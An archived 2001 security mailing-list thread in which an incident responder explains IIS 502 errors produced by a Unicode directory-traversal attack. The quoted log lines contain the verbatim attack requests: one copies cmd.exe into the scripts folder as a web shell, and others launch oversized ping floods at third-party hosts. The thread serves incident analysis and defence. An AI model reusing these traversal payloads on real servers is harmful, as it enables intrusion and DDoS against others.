Re: Unicode Logs with Ping Activity

From: Jordan K Wiens (jwiensat_private)
Date: Tue Jul 10 2001 - 10:05:45 PDT

  • Next message: myrddin_eat_private: "Re: Unicode Logs with Ping Activity"

    No, a 502 error is a bad gateway error; what happens is that your iis
    server is unpatched against the unicde exploits (one of them, at least) and
    is executing the command to ping a host.  Just recently there seems to be
    an increase in the number of hackers using vulnerable web servers for ddos
    like behavior using over-sized pings.
    
    When the ping command executes, it runs the pings, however, it (obviously)
    does not return complete html headers as its output (since ping was never
    meant to run via the web, its not supposed to run like a normal web
    executable). IIS notices this, and realizes that the script hasn't
    correctly executed, and lets you know with the 502 error.  If you actually
    look at the page, the results would read something like: "502 error; the
    application has not returned correct headers.  The headers it did return
    are:" and then IIS would procede to show the output of whatever had been
    shown.
    
    The error you want to see once a machine has been fully patched is usually
    a 404 error.
    
    -- 
    Jordan Wiens
    UF Network Incident Response Team
    (352)392-2061
    
    On Tue, 10 Jul 2001 myrddin_eat_private wrote:
    
    > Would like someone to help me understand what is going on here... The 502 
    > error at the end end of these entries would indcicate failures, wouldn't 
    > they? I've been all through the logs on this box, and even thought at every 
    > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    > shows a 502, it is there.
    > 
    > I'm looking at the times on the log entries and guessing that this was a 
    > manual attack.
    > 
    > Also, can someone please explain what is being attempted with these pings?
    > aaa.aaa.aaa.aaa
    > bbb.bbb.bbb.bbb
    > ccc.ccc.ccc.ccc.ccc
    > ddd.ddd.ddd.ddd.ddd 
    > are all unique addresses.
    > 
    > #Software: Microsoft Internet Information Services 5.0
    > #Version: 1.0
    > #Date: 2001-06-19 18:44:15
    > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
    > uri-query sc-status cs(User-Agent) 
    > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 
    > 502 -
    > Free, encrypted, secure Web-based email at www.hushmail.com
    > 
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 10 2001 - 10:15:34 PDT